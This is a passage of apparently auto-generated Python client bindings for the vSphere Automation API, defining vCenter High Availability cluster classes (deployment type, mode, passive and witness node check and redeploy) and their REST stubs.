VCHA Cluster was deployed automatically. This class attribute was added in
vSphere API 6.7.1.
"""
MANUAL = None
"""
VCHA Cluster was deployed manually. This class attribute was added in
vSphere API 6.7.1.
"""
def __init__(self, string):
"""
:type string: :class:`str`
:param string: String value for the :class:`Type` instance.
"""
Enum.__init__(string)
Type._set_values([
Type('NONE'),
Type('AUTO'),
Type('MANUAL'),
])
Type._set_binding_type(type.EnumType(
'com.vmware.vcenter.vcha.cluster.deployment_type.type',
Type))
class Info(VapiStruct):
"""
The ``DeploymentType.Info`` class contains the deployment type of the VCHA
Cluster. This class was added in vSphere API 6.7.1.
.. tip::
The arguments are used to initialize data attributes with the same
names.
"""
def __init__(self,
deployment_type=None,
):
"""
:type deployment_type: :class:`DeploymentType.Type`
:param deployment_type: Identifies the deployment type of the VCHA cluster. This attribute
was added in vSphere API 6.7.1.
"""
self.deployment_type = deployment_type
VapiStruct.__init__(self)
Info._set_binding_type(type.StructType(
'com.vmware.vcenter.vcha.cluster.deployment_type.info', {
'deployment_type': type.ReferenceType(__name__, 'DeploymentType.Type'),
},
Info,
False,
None))
def get(self):
"""
Retrieves the deployment type of a VCHA cluster. This method was added
in vSphere API 6.7.1.
:rtype: :class:`DeploymentType.Info`
:return: Info structure containing the deployment type information of the
the VCHA cluster.
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
If the user has insufficient privilege to perform the operation.
Operation execution requires the System.Read privilege.
:raise: :class:`com.vmware.vapi.std.errors_client.Error`
If any other error occurs.
"""
return self._invoke('get', None)
class Mode(VapiInterface):
"""
The Mode class provides methods to manage the operating mode of a vCenter
High Availability Cluster (VCHA Cluster). This class was added in vSphere
API 6.7.1.
"""
_VAPI_SERVICE_ID = 'com.vmware.vcenter.vcha.cluster.mode'
"""
Identifier of the service in canonical form.
"""
def __init__(self, config):
"""
:type config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
:param config: Configuration to be used for creating the stub.
"""
VapiInterface.__init__(self, config, _ModeStub)
class ClusterMode(Enum):
"""
The ``Mode.ClusterMode`` class defines the possible modes for a VCHA
Cluster. This enumeration was added in vSphere API 6.7.1.
.. note::
This class represents an enumerated type in the interface language
definition. The class contains class attributes which represent the
values in the current version of the enumerated type. Newer versions of
the enumerated type may contain new values. To use new values of the
enumerated type in communication with a server that supports the newer
version of the API, you instantiate this class. See :ref:`enumerated
type description page <enumeration_description>`.
"""
ENABLED = None
"""
VCHA Cluster is enabled. State replication between the Active and Passive
node is enabled and automatic failover is allowed. This class attribute was
added in vSphere API 6.7.1.
"""
DISABLED = None
"""
VCHA Cluster is disabled. State replication between the Active and Passive
node is disabled and automatic failover is not allowed. This class
attribute was added in vSphere API 6.7.1.
"""
MAINTENANCE = None
"""
VCHA Cluster is in maintenance mode. State replication between the and
Passive node is enabled but automatic failover is not allowed. This class
attribute was added in vSphere API 6.7.1.
"""
def __init__(self, string):
"""
:type string: :class:`str`
:param string: String value for the :class:`ClusterMode` instance.
"""
Enum.__init__(string)
ClusterMode._set_values([
ClusterMode('ENABLED'),
ClusterMode('DISABLED'),
ClusterMode('MAINTENANCE'),
])
ClusterMode._set_binding_type(type.EnumType(
'com.vmware.vcenter.vcha.cluster.mode.cluster_mode',
ClusterMode))
class Info(VapiStruct):
"""
The ``Mode.Info`` class contains the mode of the VCHA Cluster. This class
was added in vSphere API 6.7.1.
.. tip::
The arguments are used to initialize data attributes with the same
names.
"""
def __init__(self,
mode=None,
):
"""
:type mode: :class:`Mode.ClusterMode`
:param mode: Identifies the mode of the VCHA cluster. This attribute was added
in vSphere API 6.7.1.
"""
self.mode = mode
VapiStruct.__init__(self)
Info._set_binding_type(type.StructType(
'com.vmware.vcenter.vcha.cluster.mode.info', {
'mode': type.ReferenceType(__name__, 'Mode.ClusterMode'),
},
Info,
False,
None))
def get(self):
"""
Retrieves the current mode of a VCHA cluster. This method was added in
vSphere API 6.7.1.
:rtype: :class:`Mode.Info`
:return: Info structure containing the mode of the the VCHA cluster.
:raise: :class:`com.vmware.vapi.std.errors_client.NotAllowedInCurrentState`
If the VCHA cluster is not configured.
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
If the user has insufficient privilege to perform the operation.
Operation execution requires the System.Read privilege.
:raise: :class:`com.vmware.vapi.std.errors_client.Error`
If any other error occurs.
"""
return self._invoke('get', None)
def set_task(self,
mode,
):
"""
Manipulates the mode of a VCHA Cluster. Following mode transitions are
allowed:
enabled -> disabled - Allowed only in healthy and degraded states.
enabled -> maintenance - Allowed only in healthy state.
disabled -> enabled - Allowed only in healthy state.
maintenance -> enabled - Allowed only in healthy state with all nodes
are running the same version.
maintenance -> disabled - Allowed only in healthy state with all nodes
are running the same version.
All other transitions are not allowed.
VCHA Cluster configuration remains intact in any of the cluster modes..
This method was added in vSphere API 6.7.1.
:type mode: :class:`Mode.ClusterMode`
:param mode: Clustermode to change the VCHA cluster mode to.
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
If the user has insufficient privilege to perform the operation.
Operation execution requires the Global.VCServer privilege.
:raise: :class:`com.vmware.vapi.std.errors_client.Error`
If any other error occurs.
"""
task_id = self._invoke('set$task',
{
'mode': mode,
})
task_svc = Tasks(self._config)
task_instance = Task(task_id, task_svc, type.VoidType())
return task_instance
class Passive(VapiInterface):
"""
The ``Passive`` class provides methods to validate a passive's placement
configuration and redeploy the passive node in a vCenter High Availability
(VCHA) cluster. This class was added in vSphere API 6.7.1.
"""
_VAPI_SERVICE_ID = 'com.vmware.vcenter.vcha.cluster.passive'
"""
Identifier of the service in canonical form.
"""
def __init__(self, config):
"""
:type config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
:param config: Configuration to be used for creating the stub.
"""
VapiInterface.__init__(self, config, _PassiveStub)
class CheckSpec(VapiStruct):
"""
The ``Passive.CheckSpec`` class contains placement information for
validation. This class was added in vSphere API 6.7.1.
.. tip::
The arguments are used to initialize data attributes with the same
names.
"""
def __init__(self,
vc_spec=None,
placement=None,
):
"""
:type vc_spec: :class:`com.vmware.vcenter.vcha_client.CredentialsSpec` or ``None``
:param vc_spec: Contains the active node's management vCenter server credentials.
This attribute was added in vSphere API 6.7.1.
If None, then the active vCenter Server instance is assumed to be
either self-managed or else in enhanced linked mode and managed by
a linked vCenter Server instance.
:type placement: :class:`com.vmware.vcenter.vcha_client.PlacementSpec`
:param placement: Contains the node's placement information for validation. This
attribute was added in vSphere API 6.7.1.
"""
self.vc_spec = vc_spec
self.placement = placement
VapiStruct.__init__(self)
CheckSpec._set_binding_type(type.StructType(
'com.vmware.vcenter.vcha.cluster.passive.check_spec', {
'vc_spec': type.OptionalType(type.ReferenceType('com.vmware.vcenter.vcha_client', 'CredentialsSpec')),
'placement': type.ReferenceType('com.vmware.vcenter.vcha_client', 'PlacementSpec'),
},
CheckSpec,
False,
None))
class CheckResult(VapiStruct):
"""
The ``Passive.CheckResult`` class contains the warnings and errors that
will occur during the clone operation. This class was added in vSphere API
6.7.1.
.. tip::
The arguments are used to initialize data attributes with the same
names.
"""
def __init__(self,
warnings=None,
errors=None,
):
"""
:type warnings: :class:`list` of :class:`com.vmware.vapi.std_client.LocalizableMessage`
:param warnings: A list of problems which may require attention, but which are not
fatal. This attribute was added in vSphere API 6.7.1.
:type errors: :class:`list` of :class:`com.vmware.vapi.std_client.LocalizableMessage`
:param errors: A list of problems which are fatal to the operation and the
operation will fail. This attribute was added in vSphere API 6.7.1.
"""
self.warnings = warnings
self.errors = errors
VapiStruct.__init__(self)
CheckResult._set_binding_type(type.StructType(
'com.vmware.vcenter.vcha.cluster.passive.check_result', {
'warnings': type.ListType(type.ReferenceType('com.vmware.vapi.std_client', 'LocalizableMessage')),
'errors': type.ListType(type.ReferenceType('com.vmware.vapi.std_client', 'LocalizableMessage')),
},
CheckResult,
False,
None))
class RedeploySpec(VapiStruct):
"""
The ``Passive.RedeploySpec`` class contains the redeploy specification.
This class was added in vSphere API 6.7.1.
.. tip::
The arguments are used to initialize data attributes with the same
names.
"""
def __init__(self,
vc_spec=None,
placement=None,
ha_ip=None,
failover_ip=None,
):
"""
:type vc_spec: :class:`com.vmware.vcenter.vcha_client.CredentialsSpec` or ``None``
:param vc_spec: Contains the active node's management vCenter server credentials.
This attribute was added in vSphere API 6.7.1.
If None, then the active vCenter Server instance is assumed to be
either self-managed or else in enhanced linked mode and managed by
a linked vCenter Server instance.
:type placement: :class:`com.vmware.vcenter.vcha_client.PlacementSpec`
:param placement: Contains the node's placement information. This attribute was added
in vSphere API 6.7.1.
:type ha_ip: :class:`com.vmware.vcenter.vcha_client.IpSpec` or ``None``
:param ha_ip: Contains the VCHA HA network configuration of the node. All cluster
communication (state replication, heartbeat, cluster messages)
happens over this network. This attribute was added in vSphere API
6.7.1.
If None, then the stored network configuration for the VCHA HA
network for the passive node will be used.
:type failover_ip: :class:`com.vmware.vcenter.vcha_client.IpSpec` or ``None``
:param failover_ip: Failover IP address that this node must assume after the failover
to serve client requests. This attribute was added in vSphere API
6.7.1.
If None, then the public IP address of the Active vCenter Server is
assumed.
"""
self.vc_spec = vc_spec
self.placement = placement
self.ha_ip = ha_ip
self.failover_ip = failover_ip
VapiStruct.__init__(self)
RedeploySpec._set_binding_type(type.StructType(
'com.vmware.vcenter.vcha.cluster.passive.redeploy_spec', {
'vc_spec': type.OptionalType(type.ReferenceType('com.vmware.vcenter.vcha_client', 'CredentialsSpec')),
'placement': type.ReferenceType('com.vmware.vcenter.vcha_client', 'PlacementSpec'),
'ha_ip': type.OptionalType(type.ReferenceType('com.vmware.vcenter.vcha_client', 'IpSpec')),
'failover_ip': type.OptionalType(type.ReferenceType('com.vmware.vcenter.vcha_client', 'IpSpec')),
},
RedeploySpec,
False,
None))
def check(self,
spec,
):
"""
Validates the specified passive node's placement configuration. This
method was added in vSphere API 6.7.1.
:type spec: :class:`Passive.CheckSpec`
:param spec: Contains the passive node's placement specification.
:rtype: :class:`Passive.CheckResult`
:return: CheckResult structure containing errors and warnings.
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidArgument`
If the credentials provided for authentincating with the active
node's management vCenter server are invalid.
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidArgument`
If the specified resource spec is deemed invalid for the clone
operation.
:raise: :class:`com.vmware.vapi.std.errors_client.UnverifiedPeer`
If the SSL certificate of the management vCenter server cannot be
validated.
The value of the data attribute of
:class:`com.vmware.vapi.std.errors_client.Error` will be a class
that contains all the attributes defined in
:class:`com.vmware.vcenter.vcha_client.CertificateInfo`.
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
If the active virtual machine is not managed by the specified
vCenter server for the active node.
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidElementConfiguration`
If the active node is on more than one datastore.
:raise: :class:`com.vmware.vapi.std.errors_client.NotAllowedInCurrentState`
If the clone operation is not allowed in the current state of the
system.
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
If the user has insufficient privilege to perform the operation.
Operation execution requires the Global.VCServer privilege.
:raise: :class:`com.vmware.vapi.std.errors_client.Error`
If any other error occurs.
"""
return self._invoke('check',
{
'spec': spec,
})
def redeploy_task(self,
spec,
):
"""
Creates the passive node in a degraded cluster with node location
information and pre-existing VCHA cluster configuration from the active
node. This method was added in vSphere API 6.7.1.
:type spec: :class:`Passive.RedeploySpec`
:param spec: Contains the passive node's redeploy specification.
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidArgument`
If the credentials provided for authentincating with the active
node's management vCenter server are invalid.
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
If the user has insufficient privilege to perform the operation.
Operation execution requires the Global.VCServer privilege.
:raise: :class:`com.vmware.vapi.std.errors_client.UnverifiedPeer`
If the SSL certificate of the management vCenter server cannot be
validated.
The value of the data attribute of
:class:`com.vmware.vapi.std.errors_client.Error` will be a class
that contains all the attributes defined in
:class:`com.vmware.vcenter.vcha_client.CertificateInfo`.
:raise: :class:`com.vmware.vapi.std.errors_client.Error`
If any other error occurs.
"""
task_id = self._invoke('redeploy$task',
{
'spec': spec,
})
task_svc = Tasks(self._config)
task_instance = Task(task_id, task_svc, type.VoidType())
return task_instance
class Witness(VapiInterface):
"""
The ``Witness`` class provides methods to validate a witness's placement
configuration and redeploy the witness node in a vCenter High Availability
(VCHA) cluster. This class was added in vSphere API 6.7.1.
"""
_VAPI_SERVICE_ID = 'com.vmware.vcenter.vcha.cluster.witness'
"""
Identifier of the service in canonical form.
"""
def __init__(self, config):
"""
:type config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
:param config: Configuration to be used for creating the stub.
"""
VapiInterface.__init__(self, config, _WitnessStub)
class CheckSpec(VapiStruct):
"""
The ``Witness.CheckSpec`` class contains placement information for
validation. This class was added in vSphere API 6.7.1.
.. tip::
The arguments are used to initialize data attributes with the same
names.
"""
def __init__(self,
vc_spec=None,
placement=None,
):
"""
:type vc_spec: :class:`com.vmware.vcenter.vcha_client.CredentialsSpec` or ``None``
:param vc_spec: Contains the active node's management vCenter server credentials.
This attribute was added in vSphere API 6.7.1.
If None, then the active vCenter Server instance is assumed to be
either self-managed or else in enhanced linked mode and managed by
a linked vCenter Server instance.
:type placement: :class:`com.vmware.vcenter.vcha_client.PlacementSpec`
:param placement: Contains the node's placement information for validation. This
attribute was added in vSphere API 6.7.1.
"""
self.vc_spec = vc_spec
self.placement = placement
VapiStruct.__init__(self)
CheckSpec._set_binding_type(type.StructType(
'com.vmware.vcenter.vcha.cluster.witness.check_spec', {
'vc_spec': type.OptionalType(type.ReferenceType('com.vmware.vcenter.vcha_client', 'CredentialsSpec')),
'placement': type.ReferenceType('com.vmware.vcenter.vcha_client', 'PlacementSpec'),
},
CheckSpec,
False,
None))
class CheckResult(VapiStruct):
"""
The ``Witness.CheckResult`` class contains the warnings and errors that
will occur during the clone operation. This class was added in vSphere API
6.7.1.
.. tip::
The arguments are used to initialize data attributes with the same
names.
"""
def __init__(self,
warnings=None,
errors=None,
):
"""
:type warnings: :class:`list` of :class:`com.vmware.vapi.std_client.LocalizableMessage`
:param warnings: A list of problems which may require attention, but which are not
fatal. This attribute was added in vSphere API 6.7.1.
:type errors: :class:`list` of :class:`com.vmware.vapi.std_client.LocalizableMessage`
:param errors: A list of problems which are fatal to the operation and the
operation will fail. This attribute was added in vSphere API 6.7.1.
"""
self.warnings = warnings
self.errors = errors
VapiStruct.__init__(self)
CheckResult._set_binding_type(type.StructType(
'com.vmware.vcenter.vcha.cluster.witness.check_result', {
'warnings': type.ListType(type.ReferenceType('com.vmware.vapi.std_client', 'LocalizableMessage')),
'errors': type.ListType(type.ReferenceType('com.vmware.vapi.std_client', 'LocalizableMessage')),
},
CheckResult,
False,
None))
class RedeploySpec(VapiStruct):
"""
The ``Witness.RedeploySpec`` class contains the redeploy specification.
This class was added in vSphere API 6.7.1.
.. tip::
The arguments are used to initialize data attributes with the same
names.
"""
def __init__(self,
vc_spec=None,
placement=None,
ha_ip=None,
):
"""
:type vc_spec: :class:`com.vmware.vcenter.vcha_client.CredentialsSpec` or ``None``
:param vc_spec: Contains the active node's management vCenter server credentials.
This attribute was added in vSphere API 6.7.1.
If None, then the active vCenter Server instance is assumed to be
either self-managed or else in enhanced linked mode and managed by
a linked vCenter Server instance.
:type placement: :class:`com.vmware.vcenter.vcha_client.PlacementSpec`
:param placement: Contains the node's placement information. This attribute was added
in vSphere API 6.7.1.
:type ha_ip: :class:`com.vmware.vcenter.vcha_client.IpSpec` or ``None``
:param ha_ip: Contains the VCHA HA network configuration of the node. All cluster
communication (state replication, heartbeat, cluster messages)
happens over this network. This attribute was added in vSphere API
6.7.1.
If None, then the stored network configuration for the VCHA HA
network for the witness node will be used.
"""
self.vc_spec = vc_spec
self.placement = placement
self.ha_ip = ha_ip
VapiStruct.__init__(self)
RedeploySpec._set_binding_type(type.StructType(
'com.vmware.vcenter.vcha.cluster.witness.redeploy_spec', {
'vc_spec': type.OptionalType(type.ReferenceType('com.vmware.vcenter.vcha_client', 'CredentialsSpec')),
'placement': type.ReferenceType('com.vmware.vcenter.vcha_client', 'PlacementSpec'),
'ha_ip': type.OptionalType(type.ReferenceType('com.vmware.vcenter.vcha_client', 'IpSpec')),
},
RedeploySpec,
False,
None))
def check(self,
spec,
):
"""
Validates the specified witness node's placement configuration. This
method was added in vSphere API 6.7.1.
:type spec: :class:`Witness.CheckSpec`
:param spec: Contains the witness node's placement specification.
:rtype: :class:`Witness.CheckResult`
:return: CheckResult structure containing errors and warnings.
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidArgument`
If the credentials provided for authentincating with the active
node's management vCenter server are invalid.
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidArgument`
If the specified resource spec is deemed invalid for the clone
operation.
:raise: :class:`com.vmware.vapi.std.errors_client.UnverifiedPeer`
If the SSL certificate of the management vCenter server cannot be
validated.
The value of the data attribute of
:class:`com.vmware.vapi.std.errors_client.Error` will be a class
that contains all the attributes defined in
:class:`com.vmware.vcenter.vcha_client.CertificateInfo`.
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
If the active virtual machine is not managed by the specified
vCenter server for the active node.
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidElementConfiguration`
If the active node is on more than one datastore.
:raise: :class:`com.vmware.vapi.std.errors_client.NotAllowedInCurrentState`
If the clone operation is not allowed in the current state of the
system.
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
If the user has insufficient privilege to perform the operation.
Operation execution requires the Global.VCServer privilege.
:raise: :class:`com.vmware.vapi.std.errors_client.Error`
If any other error occurs.
"""
return self._invoke('check',
{
'spec': spec,
})
def redeploy_task(self,
spec,
):
"""
Creates the witness node in a degraded cluster with node location
information and pre-existing VCHA cluster configuration from the active
node. This method was added in vSphere API 6.7.1.
:type spec: :class:`Witness.RedeploySpec`
:param spec: Contains the witness node's redeploy specification.
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidArgument`
If the credentials provided for authentincating with the active
node's management vCenter server are invalid.
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
If the user has insufficient privilege to perform the operation.
Operation execution requires the Global.VCServer privilege.
:raise: :class:`com.vmware.vapi.std.errors_client.UnverifiedPeer`
If the SSL certificate of the management vCenter server cannot be
validated.
The value of the data attribute of
:class:`com.vmware.vapi.std.errors_client.Error` will be a class
that contains all the attributes defined in
:class:`com.vmware.vcenter.vcha_client.CertificateInfo`.
:raise: :class:`com.vmware.vapi.std.errors_client.Error`
If any other error occurs.
"""
task_id = self._invoke('redeploy$task',
{
'spec': spec,
})
task_svc = Tasks(self._config)
task_instance = Task(task_id, task_svc, type.VoidType())
return task_instance
class _ActiveStub(ApiInterfaceStub):
def __init__(self, config):
# properties for get operation
get_input_type = type.StructType('operation-input', {
'vc_spec': type.OptionalType(type.ReferenceType('com.vmware.vcenter.vcha_client', 'CredentialsSpec')),
'partial': type.OptionalType(type.BooleanType()),
})
get_error_dict = {
'com.vmware.vapi.std.errors.invalid_argument':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidArgument'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.unverified_peer':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'UnverifiedPeer'),
'com.vmware.vapi.std.errors.invalid_element_configuration':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidElementConfiguration'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
'com.vmware.vapi.std.errors.error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Error'),
}
get_input_value_validator_list = [
]
get_output_validator_list = [
]
get_rest_metadata = OperationRestMetadata(
http_method='POST',
url_template='/vcenter/vcha/cluster/active',
path_variables={
},
query_parameters={
}
)
operations = {
'get': {
'input_type': get_input_type,
'output_type': type.ReferenceType(__name__, 'Active.Info'),
'errors': get_error_dict,
'input_value_validator_list': get_input_value_validator_list,
'output_validator_list': get_output_validator_list,
'task_type': TaskType.NONE,
},
}
rest_metadata = {
'get': get_rest_metadata,
}
ApiInterfaceStub.__init__(
self, iface_name='com.vmware.vcenter.vcha.cluster.active',
config=config, operations=operations, rest_metadata=rest_metadata,
is_vapi_rest=True)
class _DeploymentTypeStub(ApiInterfaceStub):
def __init__(self, config):
# properties for get operation
get_input_type = type.StructType('operation-input', {})
get_error_dict = {
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Error'),
}
get_input_value_validator_list = [
]
get_output_validator_list = [
]
get_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/vcenter/vcha/cluster/deployment-type',
path_variables={
},
query_parameters={
}
)
operations = {
'get': {
'input_type': get_input_type,
'output_type': type.ReferenceType(__name__, 'DeploymentType.Info'),
'errors': get_error_dict,
'input_value_validator_list': get_input_value_validator_list,
'output_validator_list': get_output_validator_list,
'task_type': TaskType.NONE,
},
}
rest_metadata = {
'get': get_rest_metadata,
}
ApiInterfaceStub.__init__(
self, iface_name='com.vmware.vcenter.vcha.cluster.deployment_type',
config=config, operations=operations, rest_metadata=rest_metadata,
is_vapi_rest=True)
class _ModeStub(ApiInterfaceStub):
def __init__(self, config):
# properties for get operation
get_input_type = type.StructType('operation-input', {})
get_error_dict = {
'com.vmware.vapi.std.errors.not_allowed_in_current_state':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotAllowedInCurrentState'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Error'),
}
get_input_value_validator_list = [
]
get_output_validator_list = [
]
get_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/vcenter/vcha/cluster/mode',
path_variables={
},
query_parameters={
}
)
# properties for set operation
set_input_type = type.StructType('operation-input', {
'mode': type.ReferenceType(__name__, 'Mode.ClusterMode'),
})
set_error_dict = {
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Error'),
}
set_input_value_validator_list = [
]
set_output_validator_list = [
]
set_rest_metadata = OperationRestMetadata(
http_method='PUT',
url_template='/vcenter/vcha/cluster/mode',
path_variables={
},
query_parameters={
}
)
operations = {
'get': {
'input_type': get_input_type,
'output_type': type.ReferenceType(__name__, 'Mode.Info'),
'errors': get_error_dict,
'input_value_validator_list': get_input_value_validator_list,
'output_validator_list': get_output_validator_list,
'task_type': TaskType.NONE,
},
'set$task': {
'input_type': set_input_type,
'output_type': type.IdType(resource_types='com.vmware.cis.TASK'),
'errors': set_error_dict,
'input_value_validator_list': set_input_value_validator_list,
'output_validator_list': [],
'task_type': TaskType.TASK_ONLY,
},
}
rest_metadata = {
'get': get_rest_metadata,
'set': set_rest_metadata,
}
ApiInterfaceStub.__init__(
self, iface_name='com.vmware.vcenter.vcha.cluster.mode',
config=config, operations=operations, rest_metadata=rest_metadata,
is_vapi_rest=True)
class _PassiveStub(ApiInterfaceStub):
def __init__(self, config):
# properties for check operation
check_input_type = type.StructType('operation-input', {
'spec': type.ReferenceType(__name__, 'Passive.CheckSpec'),
})
check_error_dict = {
'com.vmware.vapi.std.errors.invalid_argument':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidArgument'),
'com.vmware.vapi.std.errors.unverified_peer':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'UnverifiedPeer'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
'com.vmware.vapi.std.errors.invalid_element_configuration':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidElementConfiguration'),
'com.vmware.vapi.std.errors.not_allowed_in_current_state':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotAllowedInCurrentState'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Error'),
}
check_input_value_validator_list = [
]
check_output_validator_list = [
]
check_rest_metadata = OperationRestMetadata(
http_method='POST',
url_template='/vcenter/vcha/cluster/passive',
path_variables={
},
query_parameters={
}
)
# properties for redeploy operation
redeploy_input_type = type.StructType('operation-input', {
'spec': type.ReferenceType(__name__, 'Passive.RedeploySpec'),
})
redeploy_error_dict = {
'com.vmware.vapi.std.errors.invalid_argument':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidArgument'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.unverified_peer':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'UnverifiedPeer'),
'com.vmware.vapi.std.errors.error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Error'),
}
redeploy_input_value_validator_list = [
]
redeploy_output_validator_list = [
]
redeploy_rest_metadata = OperationRestMetadata(
http_method='POST',
url_template='/vcenter/vcha/cluster/passive',
path_variables={
},
query_parameters={
}
)
operations = {
'check': {
'input_type': check_input_type,
'output_type': type.ReferenceType(__name__, 'Passive.CheckResult'),
'errors': check_error_dict,
'input_value_validator_list': check_input_value_validator_list,
'output_validator_list': check_output_validator_list,
'task_type': TaskType.NONE,
},
'redeploy$task': {
'input_type': redeploy_input_type,
'output_type': type.IdType(resource_types='com.vmware.cis.TASK'),
'errors': redeploy_error_dict,
'input_value_validator_list': redeploy_input_value_validator_list,
'output_validator_list': [],
'task_type': TaskType.TASK_ONLY,
},
}
rest_metadata = {
'check': check_rest_metadata,
'redeploy': redeploy_rest_metadata,
}
ApiInterfaceStub.__init__(
self, iface_name='com.vmware.vcenter.vcha.cluster.passive',
config=config, operations=operations, rest_metadata=rest_metadata,
is_vapi_rest=True)
class _WitnessStub(ApiInterfaceStub):
def __init__(self, config):
# properties for check operation
check_input_type = type.StructType('operation-input', {
'spec': type.ReferenceType(__name__, 'Witness.CheckSpec'),
})
check_error_dict = {
'com.vmware.vapi.std.errors.invalid_argument':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidArgument'),
'com.vmware.vapi.std.errors.unverified_peer':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'UnverifiedPeer'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
'com.vmware.vapi.std.errors.invalid_element_configuration':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidElementConfiguration'),
'com.vmware.vapi.std.errors.not_allowed_in_current_state':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotAllowedInCurrentState'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Error'),
}
check_input_value_validator_list = [
]
check_output_validator_list = [
]
check_rest_metadata = OperationRestMetadata(
http_method='POST',
url_template='/vcenter/vcha/cluster/witness',
path_variables={
},
query_parameters={
}
)
# properties for redeploy operation
redeploy_input_type = type.StructType('operation-input', {
'spec': type.ReferenceType(__name__, 'Witness.RedeploySpec'),
})
redeploy_error_dict = {
'com.vmware.vapi.std.errors.invalid_argument':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidArgument'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.unverified_peer':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'UnverifiedPeer'),
'com.vmware.vapi.std.errors.error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Error'),
}
redeploy_input_value_validator_list = [
]
redeploy_output_validator_list = [
]
redeploy_rest_metadata = OperationRestMetadata(
http_method='POST',
url_template='/vcenter/vcha/cluster/witness',
path_variables={
},
query_parameters={
}
)
operations = {
'check': {
'input_type': check_input_type,
'output_type': type.ReferenceType(__name__, 'Witness.CheckResult'),
'errors': check_error_dict,
'input_value_validator_list': check_input_value_validator_list,
'output_validator_list': check_output_validator_list,
'task_type': TaskType.NONE,
},
'redeploy$task': {
'input_type': redeploy_input_type,
'output_type': type.IdType(resource_types='com.vmware.cis.TASK'),
'errors': redeploy_error_dict,
'input_value_validator_list': redeploy_input_value_validator_list,
'output_validator_list': [],
'task_type': TaskType.TASK_ONLY,
},
}
rest_metadata = {
'check': check_rest_metadata,
'redeploy': redeploy_rest_metadata,
}
ApiInterfaceStub.__init__(
self, iface_name='com.vmware.vcenter.vcha.cluster.witness',
config=config, operations=operations, rest_metadata=rest_metadata,
is_vapi_rest=True)
class StubFactory(StubFactoryBase):
_attrs = {
'Active': Active,
'DeploymentType': DeploymentType,
'Mode': Mode,
'Passive': Passive,
'Witness': Witness,
}
